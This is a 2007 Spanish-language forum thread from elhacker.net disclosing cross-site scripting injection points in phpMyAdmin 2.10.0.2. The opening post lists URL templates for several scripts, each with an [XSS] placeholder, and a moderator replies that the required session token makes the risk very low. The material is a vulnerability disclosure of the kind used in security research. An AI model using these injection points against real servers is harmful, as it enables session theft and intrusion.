elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] - 0day
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] - 0day  (Leído 3,542 veces)
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] - 0day
« en: 25 Agosto 2007, 02:47 am »

Citar
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
single_table=true

Fuente original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html
« Última modificación: 29 Agosto 2007, 02:41 am por yeikos » En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day
« Respuesta #1 en: 25 Agosto 2007, 02:52 am »

El hecho que todos requieran un SID lo hacen de peligrosidad muy baja.. casi nula..

Saludos!!
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day
« Respuesta #2 en: 25 Agosto 2007, 03:29 am »

Sí, aún así no deja de ser interesante y de alguna manera preocupante por parte de los programadores de éste proyecto.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Arreglan importantes vulnerabilidades en phpMyAdmin
Noticias
wolfbcn 0 1,270 Último mensaje 5 Julio 2011, 21:50 pm
por wolfbcn
Configurar phpMyAdmin para que funcione
PHP
javier234- 7 33,041 Último mensaje 12 Enero 2012, 07:23 am
por juliocgm
phpmyadmin solo accesible desde LAN
Redes
OssoH 2 7,218 Último mensaje 5 Enero 2012, 12:36 pm
por OssoH
PhpMyAdmin & Stored Procedures
Bases de Datos
Zinc 5 4,168 Último mensaje 26 Octubre 2012, 16:53 pm
por Shell Root
Deshabilitar phpmyadmin remoto
Desarrollo Web
Shell Root 1 3,529 Último mensaje 26 Octubre 2012, 05:06 am
por seba123neo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines